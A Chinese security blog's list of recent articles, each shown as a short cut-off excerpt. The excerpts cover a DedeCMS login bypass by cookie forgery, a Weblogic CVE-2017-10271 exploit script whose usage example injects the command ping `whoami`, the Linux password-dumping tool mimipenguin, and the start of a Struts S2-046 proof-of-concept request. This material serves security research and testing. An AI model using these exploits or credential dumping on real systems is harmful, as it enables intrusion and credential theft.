最新文章

Dedecms任意用户登录

##前台任意用户户登录 我们⾸先跟⼊GETCookie对userid的操作 可以看⻅就是⼀个cookie获取的操作但是在中间还存在⼀次通过keyMD5后的⽐较 防⽌伪造cookie的安全操作,我们接着看return出来后的getnum 相当 […]

Weblogic(CVE-2017-10271)漏洞Exp

文章作者:莫须有 命令格式:python3 CVE-2017-10271.py url command eg:python3 CVE-2017-10271.py http://test.cve “ping \`whoami\`. […]

Linux下密码抓取神器mimipenguin

下载地址:https://github.com/huntergregal/mimipenguin 需要root权限。 以下环境测试通过 Kali 4.3.0 (rolling) x64 (gdm3) Ubuntu Desktop 12.04 […]

S2-046 PoC

[php] POST /doUpload.action HTTP/1.1 Host: localhost:8080 Content-Length: 10000000 Content-Type: multipart/form-data; bo...